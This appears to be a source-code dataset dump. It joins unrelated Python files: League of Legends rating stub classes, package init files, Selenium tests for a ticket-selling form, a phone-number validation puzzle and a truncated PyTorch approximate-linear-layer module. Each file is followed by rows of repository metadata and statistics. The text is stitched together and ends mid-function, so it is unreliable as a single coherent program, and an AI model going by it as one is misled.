class NA_Gangplank_Jng_Sivir(Ratings):
pass
class NA_Gangplank_Jng_Skarner(Ratings):
pass
class NA_Gangplank_Jng_Sona(Ratings):
pass
class NA_Gangplank_Jng_Soraka(Ratings):
pass
class NA_Gangplank_Jng_Swain(Ratings):
pass
class NA_Gangplank_Jng_Syndra(Ratings):
pass
class NA_Gangplank_Jng_TahmKench(Ratings):
pass
class NA_Gangplank_Jng_Taliyah(Ratings):
pass
class NA_Gangplank_Jng_Talon(Ratings):
pass
class NA_Gangplank_Jng_Taric(Ratings):
pass
class NA_Gangplank_Jng_Teemo(Ratings):
pass
class NA_Gangplank_Jng_Thresh(Ratings):
pass
class NA_Gangplank_Jng_Tristana(Ratings):
pass
class NA_Gangplank_Jng_Trundle(Ratings):
pass
class NA_Gangplank_Jng_Tryndamere(Ratings):
pass
class NA_Gangplank_Jng_TwistedFate(Ratings):
pass
class NA_Gangplank_Jng_Twitch(Ratings):
pass
class NA_Gangplank_Jng_Udyr(Ratings):
pass
class NA_Gangplank_Jng_Urgot(Ratings):
pass
class NA_Gangplank_Jng_Varus(Ratings):
pass
class NA_Gangplank_Jng_Vayne(Ratings):
pass
class NA_Gangplank_Jng_Veigar(Ratings):
pass
class NA_Gangplank_Jng_Velkoz(Ratings):
pass
class NA_Gangplank_Jng_Vi(Ratings):
pass
class NA_Gangplank_Jng_Viktor(Ratings):
pass
class NA_Gangplank_Jng_Vladimir(Ratings):
pass
class NA_Gangplank_Jng_Volibear(Ratings):
pass
class NA_Gangplank_Jng_Warwick(Ratings):
pass
class NA_Gangplank_Jng_Xayah(Ratings):
pass
class NA_Gangplank_Jng_Xerath(Ratings):
pass
class NA_Gangplank_Jng_XinZhao(Ratings):
pass
class NA_Gangplank_Jng_Yasuo(Ratings):
pass
class NA_Gangplank_Jng_Yorick(Ratings):
pass
class NA_Gangplank_Jng_Zac(Ratings):
pass
class NA_Gangplank_Jng_Zed(Ratings):
pass
class NA_Gangplank_Jng_Ziggs(Ratings):
pass
class NA_Gangplank_Jng_Zilean(Ratings):
pass
class NA_Gangplank_Jng_Zyra(Ratings):
pass
| 16.688249 | 46 | 0.780572 | 972 | 6,959 | 5.162551 | 0.151235 | 0.192507 | 0.440016 | 0.522519 | 0.819051 | 0.819051 | 0 | 0 | 0 | 0 | 0 | 0 | 0.159649 | 6,959 | 416 | 47 | 16.728365 | 0.858071 | 0 | 0 | 0.498195 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.498195 | 0.00361 | 0 | 0.501805 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
eb00da8f7d529cae82c52d867430abed9dd17254 | 138 | py | Python | plantcv/learn/__init__.py | luuvt/plantcv | 7548d308645edba2b347c16cb62922dddbca7ab8 | [
"MIT"
] | null | null | null | plantcv/learn/__init__.py | luuvt/plantcv | 7548d308645edba2b347c16cb62922dddbca7ab8 | [
"MIT"
] | null | null | null | plantcv/learn/__init__.py | luuvt/plantcv | 7548d308645edba2b347c16cb62922dddbca7ab8 | [
"MIT"
] | 1 | 2020-08-13T17:44:53.000Z | 2020-08-13T17:44:53.000Z | from plantcv.learn.naive_bayes import naive_bayes
from plantcv.learn.naive_bayes import naive_bayes_multiclass
__all__ = ["naive_bayes"]
| 27.6 | 60 | 0.847826 | 20 | 138 | 5.35 | 0.4 | 0.46729 | 0.299065 | 0.392523 | 0.785047 | 0.785047 | 0.785047 | 0.785047 | 0 | 0 | 0 | 0 | 0.086957 | 138 | 4 | 61 | 34.5 | 0.849206 | 0 | 0 | 0 | 0 | 0 | 0.07971 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 10 |
de2f11bf48a55f83fd53c0654bfb243d700c5aee | 109 | py | Python | RL/utilities/visualisation/__init__.py | cnHeider/gym_solutions | 737610a9b1c0ccf30d9f2213edca841c6a39f5bb | [
"Apache-2.0"
] | 2 | 2017-11-12T15:02:54.000Z | 2017-12-08T15:03:24.000Z | RL/utilities/visualisation/__init__.py | cnHeider/gym_solutions | 737610a9b1c0ccf30d9f2213edca841c6a39f5bb | [
"Apache-2.0"
] | null | null | null | RL/utilities/visualisation/__init__.py | cnHeider/gym_solutions | 737610a9b1c0ccf30d9f2213edca841c6a39f5bb | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
from .run_visdom_server import run_visdom_server
from .visualisation import update_visualiser
| 27.25 | 48 | 0.862385 | 16 | 109 | 5.5625 | 0.6875 | 0.202247 | 0.337079 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010101 | 0.091743 | 109 | 3 | 49 | 36.333333 | 0.888889 | 0.110092 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
de4a4ae26da07ca918961e772b1c0b30c9f0a1fd | 138 | py | Python | __init__.py | dpedrosac/cDBS | 75ddb6a37a6f3b25f428005afc4e882bf31b09bf | [
"MIT"
] | null | null | null | __init__.py | dpedrosac/cDBS | 75ddb6a37a6f3b25f428005afc4e882bf31b09bf | [
"MIT"
] | 6 | 2020-09-04T23:35:01.000Z | 2021-05-16T00:09:38.000Z | __init__.py | dpedrosac/cDBS | 75ddb6a37a6f3b25f428005afc4e882bf31b09bf | [
"MIT"
] | null | null | null | try:
from .version import __version__
except ModuleNotFoundError:
pass
from .utils import *
from .GUI import *
from .ext import * | 17.25 | 36 | 0.731884 | 17 | 138 | 5.705882 | 0.588235 | 0.206186 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.202899 | 138 | 8 | 37 | 17.25 | 0.881818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.142857 | 0.571429 | 0 | 0.571429 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
de839c59e96d591d557d9c5c035bf93e2a791fbe | 13,414 | py | Python | qa327_test/main/test_R4.py | EduardVar/BrainBench | abc26c5a6e7492e5c0ef03457c91175b0bb8ba41 | [
"MIT"
] | null | null | null | qa327_test/main/test_R4.py | EduardVar/BrainBench | abc26c5a6e7492e5c0ef03457c91175b0bb8ba41 | [
"MIT"
] | null | null | null | qa327_test/main/test_R4.py | EduardVar/BrainBench | abc26c5a6e7492e5c0ef03457c91175b0bb8ba41 | [
"MIT"
] | 2 | 2021-01-04T04:44:28.000Z | 2021-01-16T19:41:29.000Z | import pytest
import requests
import time
from qa327 import backend
from qa327.models import User
from werkzeug.security import generate_password_hash
from seleniumbase import BaseCase
from qa327_test.conftest import base_url
from datetime import date
@pytest.mark.usefixtures('server')
def test_server_is_live():
r = requests.get(base_url)
assert r.status_code == 200
@pytest.mark.usefixtures('server')
class Tests_R4(BaseCase):
def register(self):
""" Register new user"""
self.open(base_url + '/register')
self.type("#email", "pytest@test.com")
self.type("#name", "pytest")
self.type("#password", "PYTESTpassword!")
self.type("#password2", "PYTESTpassword!")
self.click('input[type="submit"]')
def login(self):
""" Login to Swag Labs and verify that login was successful. """
self.open(base_url + '/login')
self.type("#email", "pytest@test.com")
self.type("#password", "PYTESTpassword!")
self.click('input[type="submit"]')
def refresh(self):
backend.clean_database()
self.open(base_url + '/logout')
self.register()
self.login()
self.open(base_url)
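    def fill_sell_form(self, name, quantity, price, date_str):
        """ Hypothetical convenience helper (not used by the tests below): every
        test repeats the same form-filling sequence, which could be factored out
        like this. The selectors are the ones the tests already use. """
        self.click("#btn-add-ticket")
        self.type("#sell-ticket-name", name)
        self.type("#sell-ticket-quantity", quantity)
        self.type("#sell-ticket-price", price)
        self.type("#sell-datetime", date_str)
        self.click('#sell-ticket-button')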
def test_nameAlphaNumeric_Positive(self): # Test case R4.1.1
""" /sell[POST] The name of the ticket is alphanumeric - positive case"""
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "b@d!_nam3")
self.type("#sell-ticket-quantity", "10")
self.type("#sell-ticket-price", "20")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_element("#error_msg")
self.assert_text("Name must be alphanumeric", "#error_msg")
def test_nameAlphaNumeric_Negative(self): # Test case R4.1.1
""" /sell[POST] The name of the ticket is alphanumeric - negative case"""
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "validTicketName")
self.type("#sell-ticket-quantity", "10")
self.type("#sell-ticket-price", "20")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_text_not_visible("Name must be alphanumeric", "#error_msg")
def test_nameSpace_Negative(self): # Test case R4.1.2
""" /sell[POST] The name of the ticket allows spaces only if it is not the first or the last character - negative error case, .strip is used"""
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", " validTicketName ")
self.type("#sell-ticket-quantity", "10")
self.type("#sell-ticket-price", "20")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_element("#validTicketName") #confirm name has been stripped and is availble for purchase
def test_nameLength_Positive(self): # Test case R4.2.1
""" /sell[POST] The name of the ticket is no longer than 60 characters - positive error case"""
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "verylongstringohmythisisanextemelywrongnameIwonderifievenspeltextremelycorrectly")
self.type("#sell-ticket-quantity", "10")
self.type("#sell-ticket-price", "20")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_text("Name length must be between 6 and 60 characters", "#error_msg")
def test_nameLength_Negative(self): # Test case R4.2.1
""" /sell[POST] The name of the ticket is no longer than 60 characters - negative error case"""
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "validName2")
self.type("#sell-ticket-quantity", "10")
self.type("#sell-ticket-price", "20")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_text_not_visible("Name length must be between 6 and 60 characters", "#error_msg")
def test_quantityZero_Positive(self): # Test case R4.3.1
""" /sell[POST] The quantity of the tickets has to be more than 0 - positive error case"""
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "validName")
self.type("#sell-ticket-quantity", "0")
self.type("#sell-ticket-price", "20")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_text("Please select 1 to 100 tickets", "#error_msg")
def test_quantityZero_Negative(self): # Test case R4.3.1
"""" /sell[POST] The quantity of the tickets has to be more than 0 - negative error case"""
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "validName")
self.type("#sell-ticket-quantity", "1")
self.type("#sell-ticket-price", "20")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_text_not_visible("Please select 1 to 100 tickets", "#error_msg")
def test_quantityHundred_Positive(self): # Test case R4.3.2
""" /sell[POST] The quantity of the tickets has to be less than or equal to 100 - positive error case"""
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "validName")
self.type("#sell-ticket-quantity", "101")
self.type("#sell-ticket-price", "20")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_text("Please select 1 to 100 tickets", "#error_msg")
def test_quantityHundred_Negative(self): # Test case R4.3.2
""" /sell[POST] The quantity of the tickets has to be less than or equal to 100 - negative error case"""
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "validName")
self.type("#sell-ticket-quantity", "100")
self.type("#sell-ticket-price", "20")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_text_not_visible("Please select 1 to 100 tickets", "#error_msg")
def test_priceTen_Positive(self): # Test case R4.4.1
""" /sell[POST] Price has to be more than/equal to 10 - positive error case"""
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "validName")
self.type("#sell-ticket-quantity", "10")
self.type("#sell-ticket-price", "9")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_text("Please enter an amount between 10 and 100", "#error_msg")
def test_priceTen_Negative(self): # Test case R4.4.1
""" /sell[POST] Price has to be more than/equal to 10 - negative error case"""
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "validName")
self.type("#sell-ticket-quantity", "10")
self.type("#sell-ticket-price", "10")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_text_not_visible("Please enter an amount between 10 and 100", "#error_msg")
def test_priceHundred_Positive(self): # Test case R4.4.2
""" /sell[POST] Price has to be less/than equal to 100 - positive error case"""
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "validName")
self.type("#sell-ticket-quantity", "10")
self.type("#sell-ticket-price", "101")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_text("Please enter an amount between 10 and 100", "#error_msg")
def test_priceHundred_Negative(self): # Test case R4.4.2
""" /sell[POST] Price has to be less/than equal to 100 - negative error case"""
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "validName")
self.type("#sell-ticket-quantity", "10")
self.type("#sell-ticket-price", "100")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_text_not_visible("Please enter an amount between 10 and 100", "#error_msg")
def test_wrongDate_Positive(self): # Test case R4.5.1
""" /sell[POST] Date must be after the current date YYYYMMDD (e.g. 20200901) - positive error case"""
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "validName")
self.type("#sell-ticket-quantity", "10")
self.type("#sell-ticket-price", "100")
self.type("#sell-datetime", "20200901")
self.click('#sell-ticket-button')
self.assert_text("This ticket has expired", "#error_msg")
def test_wrongDate_Negative(self): # Test case R4.5.1
""" /sell[POST] Date must be given in the format YYYYMMDD (e.g. 20200901) - negative error case"""
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "validName")
self.type("#sell-ticket-quantity", "10")
self.type("#sell-ticket-price", "100")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_text_not_visible("This ticket has expired", "#error_msg")
def test_redirectConfirm(self): # Test case R4.6.1
""" For any errors, redirect back to / and show an error message """
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "b@dn@m3")
self.type("#sell-ticket-quantity", "10")
self.type("#sell-ticket-price", "100")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
assert str(self.get_link_status_code(base_url + "/"))
self.assert_text("Name must be alphanumeric", "#error_msg")
def test_ownerConfirm(self): # Test case R4.7.1
""" The added new ticket information will be posted on the user profile page - owner """
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "validName")
self.type("#sell-ticket-quantity", "10")
self.type("#sell-ticket-price", "100")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_element("#btn-update-validName") #user will be able to see and update their own ticket confirmation
def test_nameConfirm(self): # Test case R4.7.2
""" The added new ticket information will be posted on the user profile page - name """
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "validName")
self.type("#sell-ticket-quantity", "10")
self.type("#sell-ticket-price", "100")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_element("#btn-update-validName") #user will be able to see and update their own ticket confirmation
def test_quantityConfirm(self): # Test case R4.7.3
""" The added new ticket information will be posted on the user profile page - quantity """
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "validName")
self.type("#sell-ticket-quantity", "10")
self.type("#sell-ticket-price", "100")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_text_visible("10")
def test_priceConfirm(self): # Test case R4.7.4
""" The added new ticket information will be posted on the user profile page - price """
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "validName")
self.type("#sell-ticket-quantity", "10")
self.type("#sell-ticket-price", "100")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_text_visible("100.0")
def test_dateConfirm(self): # Test case R4.7.5
""" The added new ticket information will be posted on the user profile page - date """
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "validName")
self.type("#sell-ticket-quantity", "10")
self.type("#sell-ticket-price", "100")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_text_visible(date.today().strftime("%Y%m%d"))
| 42.18239 | 151 | 0.6116 | 1,780 | 13,414 | 4.546629 | 0.107865 | 0.088966 | 0.124552 | 0.140121 | 0.845669 | 0.819103 | 0.804893 | 0.791548 | 0.7656 | 0.7656 | 0 | 0.025599 | 0.222454 | 13,414 | 317 | 152 | 42.315457 | 0.750336 | 0.178396 | 0 | 0.691964 | 1 | 0 | 0.336281 | 0.051856 | 0 | 0 | 0 | 0 | 0.107143 | 1 | 0.111607 | false | 0.017857 | 0.040179 | 0 | 0.15625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
de869398b539a8b1cf0a2b20263dacbbd30a7601 | 4,294 | py | Python | lista-5/05_telefone.py | outrofelipe/Python-para-zumbis | 3bf1361c41ec6a8fa2bdc1a745230e630b73edd8 | [
"MIT"
] | 3 | 2016-12-23T13:20:43.000Z | 2018-04-24T23:10:59.000Z | lista-5/05_telefone.py | outrofelipe/Python-para-zumbis | 3bf1361c41ec6a8fa2bdc1a745230e630b73edd8 | [
"MIT"
] | null | null | null | lista-5/05_telefone.py | outrofelipe/Python-para-zumbis | 3bf1361c41ec6a8fa2bdc1a745230e630b73edd8 | [
"MIT"
] | 1 | 2017-07-13T23:53:34.000Z | 2017-07-13T23:53:34.000Z | '''
Question E. In the quiet country village of Ponteironuloville, every telephone
number has 6 digits. The phone company lays down the following rules for the
numbers:
1. There cannot be two identical consecutive digits, because that is boring;
2. The sum of the digits must be even, because that is cool;
3. The last digit cannot equal the first, because that brings bad luck.
So, given these perfectly reasonable, well-designed and mature rules, how many
phone numbers in the list below are valid?
213752 216732 221063 221545 225583 229133 230648 233222
236043 237330 239636 240138 242123 246224 249183 252936
254711 257200 257607 261424 263814 266794 268649 273050
275001 277606 278997 283331 287104 287953 289137 291591
292559 292946 295180 295566 297529 300400 304707 306931
310638 313595 318449 319021 322082 323796 326266 326880
327249 329914 334392 334575 336723 336734 338808 343269
346040 350113 353631 357154 361633 361891 364889 365746
365749 366426 369156 369444 369689 372896 374983 375223
379163 380712 385640 386777 388599 389450 390178 392943
394742 395921 398644 398832 401149 402219 405364 408088
412901 417683 422267 424767 426613 430474 433910 435054
440052 444630 447852 449116 453865 457631 461750 462985
463328 466458 469601 473108 476773 477956 481991 482422
486195 488359 489209 489388 491928 496569 496964 497901
500877 502386 502715 507617 512526 512827 513796 518232
521455 524277 528496 529345 531231 531766 535067 535183
536593 537360 539055 540582 543708 547492 550779 551595
556493 558807 559102 562050 564962 569677 570945 575447
579937 580112 580680 582458 583012 585395 586244 587393
590483 593112 593894 594293 597525 598184 600455 600953
601523 605761 608618 609198 610141 610536 612636 615233
618314 622752 626345 626632 628889 629457 629643 633673
637656 641136 644176 644973 647617 652218 657143 659902
662224 666265 668010 672480 672695 676868 677125 678315
Author: Felipe Nogueira de Souza
'''
def consecutivos(num):
    # rule 1: no two identical consecutive digits
    for i in range(5):
        if num[i] == num[i + 1]:
            return True
    return False
def par(num):
    # rule 2: the digit sum must be even
    soma = 0
    for i in range(6):
        soma += int(num[i])
    if soma % 2 == 0:
        return True
    return False
def iguais(num):
    # rule 3: the last digit must not equal the first
    if num[0] == num[5]:
        return True
    return False
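# Quick sanity check (illustrative): '213752' has no repeated neighbours and an
# even digit sum (2+1+3+7+5+2 = 20), but it starts and ends with '2', so rule 3
# rejects it.
exemplo = list("213752")
assert not consecutivos(exemplo)
assert par(exemplo)
assert iguais(exemplo)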
telefones = ("213752 216732 221063 221545 225583 229133 230648 233222\
236043 237330 239636 240138 242123 246224 249183 252936\
254711 257200 257607 261424 263814 266794 268649 273050\
275001 277606 278997 283331 287104 287953 289137 291591\
292559 292946 295180 295566 297529 300400 304707 306931\
310638 313595 318449 319021 322082 323796 326266 326880\
327249 329914 334392 334575 336723 336734 338808 343269\
346040 350113 353631 357154 361633 361891 364889 365746\
365749 366426 369156 369444 369689 372896 374983 375223\
379163 380712 385640 386777 388599 389450 390178 392943\
394742 395921 398644 398832 401149 402219 405364 408088\
412901 417683 422267 424767 426613 430474 433910 435054\
440052 444630 447852 449116 453865 457631 461750 462985\
463328 466458 469601 473108 476773 477956 481991 482422\
486195 488359 489209 489388 491928 496569 496964 497901\
500877 502386 502715 507617 512526 512827 513796 518232\
521455 524277 528496 529345 531231 531766 535067 535183\
536593 537360 539055 540582 543708 547492 550779 551595\
556493 558807 559102 562050 564962 569677 570945 575447\
579937 580112 580680 582458 583012 585395 586244 587393\
590483 593112 593894 594293 597525 598184 600455 600953\
601523 605761 608618 609198 610141 610536 612636 615233\
618314 622752 626345 626632 628889 629457 629643 633673\
637656 641136 644176 644973 647617 652218 657143 659902\
662224 666265 668010 672480 672695 676868 677125 678315")
telefones = telefones.split()
cont = 0
for n in telefones:
n = list(n)
if not consecutivos(n):
if par(n):
if not iguais(n):
cont += 1
print(cont)
| 46.673913 | 82 | 0.722403 | 567 | 4,294 | 5.470899 | 0.5097 | 0.009671 | 0.015474 | 0.020309 | 0.789168 | 0.773694 | 0.773694 | 0.773694 | 0.773694 | 0.773694 | 0 | 0.750155 | 0.250582 | 4,294 | 91 | 83 | 47.186813 | 0.213797 | 0.451095 | 0 | 0.12 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010989 | 0 | 1 | 0.06 | false | 0 | 0 | 0 | 0.18 | 0.02 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
decf231a82e74b2e6d33ad6b1869a6620b5b0f0e | 24,248 | py | Python | ApproxSrc/functional/approx_linear.py | sirius0000/SR-Mongoose | 068068c7fbc6d1b1bb33ffa31529dda55580b7f2 | [
"MIT"
] | 5 | 2021-07-08T12:28:27.000Z | 2022-03-10T16:44:25.000Z | ApproxSrc/functional/approx_linear.py | sirius0000/SR-Mongoose | 068068c7fbc6d1b1bb33ffa31529dda55580b7f2 | [
"MIT"
] | null | null | null | ApproxSrc/functional/approx_linear.py | sirius0000/SR-Mongoose | 068068c7fbc6d1b1bb33ffa31529dda55580b7f2 | [
"MIT"
] | 2 | 2021-10-20T04:29:11.000Z | 2022-03-10T16:44:29.000Z | import torch
from ..modules.utils import *
def approx_linear_forward(input,weight,bias,sample_ratio,minimal_k,sample_ratio_bwd,minimal_k_bwd,sample_ratio_wu,minimal_k_wu):
r"""
Applies approximate linear transformation to the incoming data: :math:`y = xA^T + b`.
the matrix multiply xA^T is approximated
note: weight transposition is done in this function
Shape:
- Input: :math:`(N, *, in\_features)` where `*` means any number of
additional dimensions
- Weight: :math:`(out\_features, in\_features)`
- Bias: :math:`(out\_features)`
- Output: :math:`(N, *, out\_features)`
"""
#return torch.nn.functional.linear(input,weight,bias)
return approx_linear_forward_xA_b(input,weight.t(),bias,sample_ratio, minimal_k,sample_ratio_bwd,minimal_k_bwd,sample_ratio_wu,minimal_k_wu)
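# Illustrative shape check (hypothetical helper, not called anywhere): `weight`
# follows the nn.Linear convention, i.e. (out_features, in_features), and is
# transposed above before the sampled matmul.
def _demo_forward_shapes():
    x = torch.randn(32, 512)
    w = torch.randn(128, 512)
    b = torch.zeros(128)
    return approx_linear_forward(x, w, b, 0.25, 16, None, None, None, None).shape  # (32, 128)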
def approx_linear_forward_xA_b(input,weight,bias,sample_ratio,minimal_k,sample_ratio_bwd,minimal_k_bwd,sample_ratio_wu,minimal_k_wu):
r"""
Applies approximate linear transformation to the incoming data: :math:`y = xA + b`.
Note: A is assumed not transposed
the matrix multiply xA is approximated
Shape:
- Input: :math:`(N, *, in\_features)` where `*` means any number of
additional dimensions
- Weight: :math:`(in\_features, out\_features)`
- Bias: :math:`(out\_features)`
- Output: :math:`(N, *, out\_features)`
"""
#return linear_top_k(input,weight,bias,sample_ratio, minimal_k,sample_ratio_bwd,minimal_k_bwd,sample_ratio_wu,minimal_k_wu)
#return linear_top_k_approx(input,weight,bias,sample_ratio, minimal_k,sample_ratio_bwd,minimal_k_bwd,sample_ratio_wu,minimal_k_wu)
#return linear_uniform_sampling(input,weight,bias,sample_ratio, minimal_k)
#return linear_random_sampling(input,weight,bias,sample_ratio, minimal_k, with_replacement=True, optimal_prob=True, scale=True,sample_ratio_bwd=sample_ratio_bwd, minimal_k_bwd=minimal_k_bwd, sample_ratio_wu=sample_ratio_wu, minimal_k_wu=minimal_k_wu)
#return approx_linear_xA_b.topk(input,weight,bias,sample_ratio, minimal_k)
return linear_bernoulli_sampling(input,weight,bias,sample_ratio, minimal_k, scale=True,sample_ratio_bwd=sample_ratio_bwd, minimal_k_bwd=minimal_k_bwd, sample_ratio_wu=sample_ratio_wu, minimal_k_wu=minimal_k_wu)
''' Approximates the matrix multiply A*B+b by sampling the column-row pairs with the largest norm
A - input matrix, shape (N,*,in_features) where '*' means any number of additional dimensions
B - input matrices, shape (in_features, out_features)
bias - bias vector, shape (out_features)
sample_ratio - Ratio of column-row pairs to sample
minimal_k - Minimal number of column-row pairs to keep in the sampling
note: B is not transposed
output: A*B+b, shape (N,*,out_features)
'''
def linear_top_k(A,B,bias,sample_ratio, minimal_k,sample_ratio_bwd=None,minimal_k_bwd=None,sample_ratio_wu=None,minimal_k_wu=None):
#print("Sanity check - top_k is used")
#print("A size: {}".format(A.size()))
#print("B size: {}".format(B.size()))
#print("bias size: {}".format(bias.size()))
#print("sample_ratio: {}".format(sample_ratio))
#print("minimal_k: {}".format(minimal_k))
#print("sample_ratio_bwd: {}".format(sample_ratio_bwd))
#print("minimal_k_bwd: {}".format(minimal_k_bwd))
#print("sample_ratio_wu: {}".format(sample_ratio_wu))
#print("minimal_k_wu: {}".format(minimal_k_wu))
in_features = A.size()[-1]
# calculate the number of column-row pairs to sample for the forward propagation phase
k_candidate = int(float(in_features)*sample_ratio)
# make k at least minimal_k
k = min(max(k_candidate,minimal_k),in_features)
# if because of minimal_k or sample_ratio k equals the number of features, perform full matmul instead of approximating
if k == in_features:
#no need to sample. perform normal matmul
if A.dim() == 2 and bias is not None:
# fused op is marginally faster
C = torch.addmm(bias, A, B)
else:
C = torch.matmul(A, B)
if bias is not None:
C += bias
return C
with torch.no_grad():
# calculate norms of the columns of A and rows of B
if A.dim() == 2:
a_col_norms = torch.norm(A,dim=0)
else:
            # since we sample across in_features, consider other dimensions as a single dimension for sampling purposes
a_col_norms = torch.norm(A.view(-1,in_features),dim=0)
b_row_norms = torch.norm(B,dim=1)
# multiply both norms element-wise to and pick the indices of the top K column-row pairs
norm_mult = torch.mul(a_col_norms,b_row_norms)
#top_k_indices = torch.topk(norm_mult,k)[1]
top_k_indices = topk_indices(norm_mult,k)
# pick top-k column-row pairs to form new smaller matrices
A_top_k_cols = torch.index_select(A,dim = -1, index = top_k_indices)
B_top_k_rows = torch.index_select(B,dim = 0, index = top_k_indices)
# multiply smaller matrices
if sample_ratio_bwd is None and sample_ratio_wu is None:
if A.dim() == 2 and bias is not None:
# fused op is marginally faster
C_approx = torch.addmm(bias, A_top_k_cols, B_top_k_rows)
else:
C_approx = torch.matmul(A_top_k_cols, B_top_k_rows)
if bias is not None:
C_approx += bias
else:
# The following code will be used to apply additional sampling in the backward pass but update only the
# sub-tensors sampled in the forward pass.
# For simplicity, we don't optimize for torch.addmm usage in this case
